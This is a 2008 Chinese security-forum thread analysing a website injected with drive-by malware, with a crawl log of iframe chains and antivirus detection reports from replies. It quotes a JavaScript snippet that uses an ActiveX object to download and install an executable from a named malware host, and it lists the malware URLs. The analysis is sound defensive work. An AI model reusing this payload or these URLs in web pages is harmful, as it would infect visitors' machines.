又是挂马....又是挂马..

显示全部楼层 · 发表于 2008-12-6 12:10:00

从举报区里弄出来的
Log is generated by FreShow.
[wide]http://www.51files.com/?1WKMG1HJBG23XTW7Y6F9
[script]http://www.51files.com/js/menu.js
[frame]http://www.51files.com/UserLogin.asp?ShowType=2
[script]http://www.51files.com/AD/200804/4.js
[script]http://www.51files.com/js/date.js
      [frame]http://wodedipan990.cn/d4/1.htm?01
         [frame]http://wodedipan990.cn/d4/flash.gif（Flash不解）
         [frame]http://wodedipan990.cn/d4/cx.gif
            [object]http://longzaitian8899.com/xia/a1.exe
         [frame]http://wodedipan990.cn/d4/14.gif
            [object]http://longzaitian8899.com/xia/a1.exe
         [frame]http://wodedipan990.cn/d4/office.gif
            [object]http://longzaitian8899.com/xia/a1.exe
         [frame]http://wodedipan990.cn/d4/nct.gif
            [object]http://longzaitian8899.com/xia/a1.exe
         [frame]http://wodedipan990.cn/d4/UU.gif
         [frame]http://wodedipan990.cn/d4/xl.gif
            [object]http://longzaitian8899.com/xia/a1.exe
         [frame]http://wodedipan990.cn/d4/gl.gif
            [object]http://longzaitian8899.com/xia/a1.exe
         [frame]http://wodedipan990.cn/d4/bf.gif
            [object]http://longzaitian8899.com/xia/a1.exe
         [frame]http://wodedipan990.cn/d4/re10.gif
            [object]http://longzaitian8899.com/xia/a1.exe
         [frame]http://wodedipan990.cn/d4/re11.gif
            [object]http://longzaitian8899.com/xia/a1.exe
         [object]http://longzaitian8899.com/xia/a1.exe
[script]http://www.51files.com/AD/200804/5.js
[script]http://www.51files.com/AD/200810/11.js
[script]http://www.51files.com/pictures/JS/180.js
[script]http://www.51files.com/AD/200804/6.js
这回我罕见的用了FreShow，原因就是那个Redoce点击gif出不来东西...

这个东西很好玩，在http://wodedipan990.cn/d4/1.htm?01里头都挂了马

finally{if(m!="[object Error]"){document.write('<object classid="clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A" id="install" width=0 height=0></object>');install["DownloadAndInstall"]("http://longzaitian8899.com/xia/a1.exe")}}

复制代码

显示全部楼层 · 发表于 2008-12-6 12:28:48

原来是有NS下载器

显示全部楼层 · 发表于 2008-12-6 12:33:13

TO KL

显示全部楼层 · 发表于 2008-12-6 12:35:34

Access to the data has been denied!
Warning: A virus or unwanted program has been found in the HTTP Data.

Requested URL: http://longzaitian8899.com/xia/a1.exe
Information: Is the TR/Dropper.Gen Trojan

--------------------------------------------------------------------------------
Generated by AntiVir WebGuard 8.0.15.0, AVE 8.2.0.42, VDF 7.1.0.195

显示全部楼层 · 发表于 2008-12-6 12:40:51

ESET 拦截

显示全部楼层 · 发表于 2008-12-6 13:05:59

Hello,

a1.exe_ - Worm.Win32.Agent.pn

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

显示全部楼层 · 发表于 2008-12-6 13:15:57

哈哈瑞星09 拦截貌似还不少

显示全部楼层 · 发表于 2008-12-6 17:47:06

红伞.二话不说.直接拦掉..

显示全部楼层 · 发表于 2008-12-6 21:52:34

原帖由 newcenturysun 于 2008-12-6 13:15 发表
哈哈瑞星09 拦截貌似还不少

一直觉得瑞星的界面友好性实在是………………
回头出个挂几十个马的网页，瑞星一下子开它几十个提示窗口的。。。。

[已鉴定] 又是挂马....又是挂马..